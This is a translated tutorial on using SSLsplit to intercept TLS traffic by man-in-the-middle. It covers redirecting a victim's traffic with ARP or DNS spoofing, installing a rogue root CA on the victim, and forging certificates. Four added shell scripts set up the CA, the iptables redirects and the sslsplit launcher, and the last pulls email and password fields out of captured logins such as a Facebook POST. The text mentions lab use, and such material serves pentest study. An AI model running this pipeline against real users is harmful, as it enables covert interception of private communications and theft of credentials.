I recently demonstrated how to use mitmproxy to perform a man-in-the-middle attack on HTTP(S) connections. While mitmproxy works well for HTTP-based communication, it does not understand other TLS/SSL-based traffic such as FTPS, SMTP over SSL, IMAP over SSL, or any other protocol that is wrapped in TLS/SSL.
SSLsplit is a generic TLS/SSL proxy for man-in-the-middle attacks on all kinds of secure communication protocols. Using SSLsplit, you can intercept and store TLS/SSL-based traffic and thereby listen in on any secure connection.
1. Working principle
SSLsplit works much like other SSL proxy tools: it acts as a middleman between the client and the server. As long as traffic is redirected to the host running SSLsplit (by changing the default gateway, ARP spoofing, or other means), SSLsplit terminates the TLS/SSL connection and pretends to be the server the client wanted to reach. To do so, it dynamically forges a certificate and signs it with the private key of a CA certificate that the client trusts.
For example, if a client wants to send an e-mail via Gmail's SMTP server (smtp.gmail.com, port 465), SSLsplit forges a certificate for smtp.gmail.com and pretends to be the Gmail mail server towards the client. In the upstream direction (towards the real Gmail server), SSLsplit connects just like a normal client would and forwards all the traffic the actual client writes.
If you are interested in the details, have a look at the "How it works" part of the blog post about HTTP interception with mitmproxy. The basic concept is the same, so it should be easy to follow.
2. Installing and running SSLsplit
How to intercept SSL (and non-SSL) traffic.
2.1 Traffic redirection
2.1.1 Use ARP spoofing to pull the victim's traffic to the attacker by announcing the attacker's MAC address for the default gateway's IP address. This needs no physical access to the victim. Have a look at the arpspoof tool.
2.1.2 Change the victim's default gateway to the attacker's IP. This is the simplest method if you have access to the victim's device.
2.1.3 Use DNS spoofing: poison the victim's DNS cache or the DNS server's entries so that the domains of interest resolve to the attacker's IP address. See a DNS spoofing tutorial.
2.1.4 Redirect individual domains by editing the victim's /etc/hosts file.
The simplest of the methods above is to change the victim's default gateway to the attacker's IP address; this makes sure all traffic passes through your machine. Since we need to install the CA certificate on the victim later anyway, we need physical access to the victim's machine in any case.
2.2 Download and compile SSLsplit
2.3 Create and install a root CA certificate
For SSLsplit to act as man-in-the-middle, the victim must trust the attacker's root CA certificate. How the root certificate is installed differs somewhat depending on the type of client (browser, phone).
Generate a CA private key and certificate:
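The following script is an added example and not the original post's commands: it generates the CA key and self-signed certificate with openssl and then checks the two things that most often break a later interception, namely a certificate without the CA flag and a key that does not belong to the certificate. The directory name, key size, validity and subject are assumptions.

```shell
#!/bin/sh
# Added example, not taken from the original post: create the root CA that
# SSLsplit signs its forged leaf certificates with, and check it before
# installing it on the victim. File names, key size, validity and the
# subject are assumptions; change them as you like.
set -e

CA_DIR="${CA_DIR:-./sslsplit-ca}"
CA_KEY="$CA_DIR/ca.key"     # later handed to sslsplit with -k
CA_CRT="$CA_DIR/ca.crt"     # later handed to sslsplit with -c, installed on the victim

# Generate the key and a self-signed certificate. The v3_ca extensions are
# what make clients accept leaf certificates signed by this key: without
# basicConstraints CA:TRUE most browsers reject the chain even though the
# root itself is installed as trusted.
make_ca() {
    mkdir -p "$CA_DIR"
    chmod 700 "$CA_DIR"
    cat > "$CA_DIR/ca.cnf" <<'EOF'
[req]
distinguished_name = dn
x509_extensions    = v3_ca
prompt             = no
[dn]
CN = SSLsplit Lab CA
O  = Lab
[v3_ca]
basicConstraints     = critical, CA:TRUE
keyUsage             = critical, keyCertSign, cRLSign
subjectKeyIdentifier = hash
EOF
    openssl genrsa -out "$CA_KEY" 4096 2>/dev/null
    chmod 600 "$CA_KEY"
    openssl req -new -x509 -days 365 -key "$CA_KEY" -out "$CA_CRT" \
        -config "$CA_DIR/ca.cnf" 2>/dev/null
}

# True if the certificate carries the CA flag.
is_ca_cert() {
    openssl x509 -in "$1" -noout -text | grep -q 'CA:TRUE'
}

# True if the private key belongs to the certificate. A mismatch between
# -k and -c makes every forgery fail at the TLS handshake.
key_matches_cert() {
    [ "$(openssl pkey -in "$1" -pubout 2>/dev/null)" = \
      "$(openssl x509 -in "$2" -noout -pubkey)" ]
}

# SHA-1 fingerprint of the CA: the value to compare with the issuer
# fingerprint sslsplit prints and with what the victim's certificate
# viewer shows.
ca_fingerprint() {
    openssl x509 -in "$1" -noout -fingerprint -sha1 | sed 's/^.*=//'
}

if [ "${1:-}" = create ]; then
    make_ca
    is_ca_cert "$CA_CRT"
    key_matches_cert "$CA_KEY" "$CA_CRT"
    echo "CA written to $CA_DIR, SHA1 $(ca_fingerprint "$CA_CRT")"
fi
```

Run it as `sh make-ca.sh create`, then copy only ca.crt to the victim. Anyone holding ca.key can intercept every victim that trusts ca.crt, so keep the key on the attacker box only, use a CA generated for the lab, and remove the certificate from the victim's trust store afterwards.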
2.4 Enable IP forwarding and the NAT engine (iptables)
In this example, SSLsplit listens on two ports: 8080 for non-SSL TCP connections such as HTTP, SMTP or FTP, and 8443 for SSL connections such as SMTP over SSL or HTTPS. To get the packets arriving at the attacker's machine to these local ports, the NAT engine (iptables REDIRECT) can be used.
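As an added example (not the post's own rule set), the script below builds the iptables REDIRECT rules for the two listeners named above and checks the forwarding flag. It prints the rules first so they can be reviewed before they are applied; which destination ports to intercept and the interface name are assumptions.

```shell
#!/bin/sh
# Added example, not taken from the original post: enable forwarding and
# build the iptables REDIRECT rules that push intercepted ports to the two
# SSLsplit listeners named in the text (8080 plain TCP, 8443 TLS). Which
# destination ports to grab and the interface name are assumptions.
set -e

PLAIN_PORT=8080          # sslsplit "tcp" proxyspec
TLS_PORT=8443            # sslsplit "ssl" proxyspec
IFACE="${IFACE:-eth0}"   # interface the victim's traffic arrives on

# Map a destination port to the listener that can handle it. Only ports
# that speak TLS from the first byte belong on the ssl listener; a
# STARTTLS port (25, 587, 143) starts in plaintext and would only produce
# a handshake error there. Unknown ports return 1 so nothing is
# redirected by accident.
listener_for() {
    case "$1" in
        80|21|25)        echo "$PLAIN_PORT" ;;   # HTTP, FTP control, SMTP
        443|465|993|995) echo "$TLS_PORT" ;;     # HTTPS, SMTPS, IMAPS, POP3S
        *)               return 1 ;;
    esac
}

# Print (do not run) the rule for one port, so the set can be reviewed.
# PREROUTING only sees packets from other hosts; traffic generated on the
# attacker box itself would need the same rule in the OUTPUT chain.
redirect_rule() {
    target="$(listener_for "$1")" || return 1
    echo "iptables -t nat -A PREROUTING -i $IFACE -p tcp --dport $1" \
         "-j REDIRECT --to-ports $target"
}

nat_rules() {
    echo "iptables -t nat -F PREROUTING"
    for port in "$@"; do redirect_rule "$port"; done
}

# Read-only check of the forwarding flag. Everything that is not
# REDIRECTed (DNS over UDP, ports you did not list) still has to be
# routed on to the real gateway, otherwise the victim loses connectivity
# and notices.
ip_forward_enabled() {
    [ "$(cat /proc/sys/net/ipv4/ip_forward 2>/dev/null || echo 0)" = 1 ]
}

apply_rules() {
    sysctl -w net.ipv4.ip_forward=1
    nat_rules "$@" | sh -e
    ip_forward_enabled || { echo "ip_forward is still off" >&2; return 1; }
}

case "${1:-}" in
    show)  shift; nat_rules "$@" ;;
    apply) shift; apply_rules "$@" ;;
esac
```

`sh nat.sh show 80 443 465 993` prints the rules, `sh nat.sh apply 80 443 465 993` installs them as root. Two things to check on the victim side: these are IPv4 rules only, so a victim with working IPv6 will bypass the proxy for dual-stack sites, and a port left off the list is forwarded unchanged rather than intercepted.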
2.5 Running SSLsplit
Once IP forwarding is active and the packets are redirected to the relevant ports, you can start SSLsplit. That sounds simple, and it is. Because SSLsplit is a very powerful tool, it is also very flexible; see the sslsplit manual page for the details.
A reasonable set of parameters:
This command starts SSLsplit in debug mode (-D: run in the foreground instead of as a daemon, with verbose output), logs each connection to the file "connections.log" (-l ...) and writes the actual connection contents to "/tmp/sslsplit/logdir/" (-j ... and -S ...). Each connection gets its own file containing the incoming and outgoing TCP stream.
Assuming your configuration is correct, you can now start browsing and sending/receiving e-mail. SSLsplit prints the connection details to the console:
Each file corresponds to one TCP connection that was opened and indicates the exact time as well as the source and destination IP addresses and ports, as you can see from the file names:
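The launcher below is an added example and not the post's own command line: it reconstructs the sslsplit invocation from the options described in the paragraph above and adds the checks that catch the usual reasons for a silent failure before the first victim connects. Paths and ports are assumptions (the CA files from step 2.3, the jail /tmp/sslsplit, and the 8443/8080 listeners from step 2.4).

```shell
#!/bin/sh
# Added example, not taken from the original post: the sslsplit invocation
# the text describes, reconstructed from its option list, plus the checks
# that catch the usual reasons for a silent failure. Paths and ports are
# assumptions (CA files from step 2.3, jail /tmp/sslsplit, listeners 8443
# for TLS and 8080 for plain TCP as in step 2.4).
set -e

CA_KEY="${CA_KEY:-ca.key}"
CA_CRT="${CA_CRT:-ca.crt}"
JAIL="${JAIL:-/tmp/sslsplit}"          # -j: sslsplit chroots into this directory
LOGDIR="${LOGDIR:-logdir}"             # -S: ends up under the jail, so /tmp/sslsplit/logdir
CONNLOG="${CONNLOG:-connections.log}"  # -l: one summary line per connection
TLS_PORT="${TLS_PORT:-8443}"
PLAIN_PORT="${PLAIN_PORT:-8080}"

# Fail before starting rather than after the first victim connection:
# unreadable CA material, or a content log directory that does not exist
# inside the jail.
check_prereqs() {
    [ -r "$CA_KEY" ] || { echo "CA key not readable: $CA_KEY" >&2; return 1; }
    [ -r "$CA_CRT" ] || { echo "CA cert not readable: $CA_CRT" >&2; return 1; }
    [ -d "$JAIL/$LOGDIR" ] || { echo "log dir missing: $JAIL/$LOGDIR" >&2; return 1; }
    return 0
}

# Start in the foreground with debug output (-D). The two proxyspecs have
# no target address, so sslsplit looks the original destination up from
# the NAT table; the iptables REDIRECT rules therefore have to be in place
# before any victim connects.
run_sslsplit() {
    mkdir -p "$JAIL/$LOGDIR"
    check_prereqs
    exec sslsplit -D -l "$CONNLOG" -j "$JAIL" -S "$LOGDIR" \
        -k "$CA_KEY" -c "$CA_CRT" \
        ssl 0.0.0.0 "$TLS_PORT" \
        tcp 0.0.0.0 "$PLAIN_PORT"
}

if [ "${1:-}" = run ]; then run_sslsplit; fi
```

Start it with `sh run-sslsplit.sh run` as root (binding the listeners and the chroot both need it). The content files land in /tmp/sslsplit/logdir, not in ./logdir, because the -S path is taken relative to the jail, which is the detail that most often sends people looking in the wrong directory.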
3. Examples
SSLsplit can be used to sniff various protocols. Below are a few examples: HTTPS, IMAP over SSL and SMTP over SSL.
3.1 Sniffing HTTPS (google.de & facebook.com)
Once SSLsplit is running, all communication between the client and the real server passes through it. With the -D option, SSLsplit prints the connections and certificate forgeries to stdout. In addition, the contents are written to the log directory ("/tmp/sslsplit/logdir"). With tail -f /tmp/sslsplit/logdir/20130804T162301Z-*.log you can follow the communication between client and server.
The upper console shows SSLsplit's output: the upstream certificate is the real Facebook certificate, while the downstream one was forged by SSLsplit. The two fingerprints differ because the certificates were signed by different certificate authorities.
The lower console shows the contents of the HTTPS communication, here the HTTPS POST request to https://www.facebook.com/login.php?login_attempt=1 including my user name (&email=) and password (&pass=).
If you click the small lock icon on any TLS/SSL-encrypted website while traffic is redirected through SSLsplit, you will see that the certificate was issued to the real common name (CN), organization (O) and organizational unit (OU), but not by a real CA.
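As an added example (not part of the original post), the script below does the two things a practitioner does with the per-connection files from step 2.5 and the login POST shown above: it picks the connections to one destination port out of the log directory, and it pulls the named form fields out of a captured body and URL-decodes them. The file name layout it assumes, `<UTC time>-<src ip>,<src port>-<dst ip>,<dst port>.log`, is inferred from the 20130804T162301Z-*.log pattern in the text and should be checked against your sslsplit version; the sample request body is constructed, not captured.

```shell
#!/bin/sh
# Added example, not taken from the original post: triage the per-connection
# files sslsplit writes under -S (step 2.5) and pull the login fields out of
# a captured POST like the facebook.com one above. The file name layout
# assumed here, <UTC time>-<src ip>,<src port>-<dst ip>,<dst port>.log,
# matches the 20130804T162301Z-*.log pattern in the text; check it against
# your sslsplit version. The sample request body below is constructed.
set -e

LOGDIR="${LOGDIR:-/tmp/sslsplit/logdir}"

# "TIME SRC:PORT DST:PORT" from a log file name.
parse_logname() {
    name="${1##*/}"; name="${name%.log}"
    ts="${name%%-*}"; rest="${name#*-}"
    src="${rest%%-*}"; dst="${rest#*-}"
    echo "$ts ${src%,*}:${src#*,} ${dst%,*}:${dst#*,}"
}

# Connections to one destination port (443 HTTPS, 993 IMAPS, 465 SMTPS),
# so one protocol can be followed instead of the whole capture.
connections_to_port() {
    for f in "$LOGDIR"/*,"$1".log; do
        if [ -e "$f" ]; then parse_logname "$f"; fi
    done
}

# Decode application/x-www-form-urlencoded text: '+' to space, %XX to the
# byte. Done in awk because POSIX printf only understands octal escapes.
urldecode() {
    awk 'BEGIN { for (i = 0; i < 256; i++) hex[sprintf("%02X", i)] = i }
    {
        s = $0; gsub(/\+/, " ", s); out = ""
        while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
            out = out substr(s, 1, RSTART - 1) sprintf("%c", hex[toupper(substr(s, RSTART + 1, 2))])
            s = substr(s, RSTART + 3)
        }
        print out s
    }'
}

# Values of the named fields (an ERE alternation such as 'email|pass')
# from a form body read on stdin, one per line, decoded.
form_fields() {
    tr '&' '\n' | grep -E "^($1)=" | cut -d= -f2- | urldecode
}

# Constructed sample body of a login POST, not a real capture.
SAMPLE_BODY='lsd=AVq&email=alice%40example.com&pass=s3cret%21&login=Log+In'

if [ "${1:-}" = demo ]; then
    parse_logname "$LOGDIR/20130804T162301Z-192.168.1.100,56215-203.0.113.10,443.log"
    printf '%s\n' "$SAMPLE_BODY" | form_fields 'email|pass'
fi
```

`connections_to_port 993 | sort` gives a timeline of the IMAPS sessions only, and `form_fields 'email|pass' < "$LOGDIR/<file>.log` reads the credentials straight out of a captured HTTPS login, which is exactly what the forged certificate buys the attacker once the victim trusts the CA.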
More examples can be found at http://blog.philippheckel.com/2013/08/04/use-sslsplit-to-transparently-sniff-tls-ssl-connections/
This article was translated by 360 Security Broadcast. When reposting, please mark it "Reposted from 360 Security Broadcast" and include the link.
Original link: http://blog.philippheckel.com/2013/08/04/use-sslsplit-to-transparently-sniff-tls-ssl-connections/
The above is the original article.
Below is a screenshot of my successful test.
Using SSLsplit to sniff TLS/SSL connections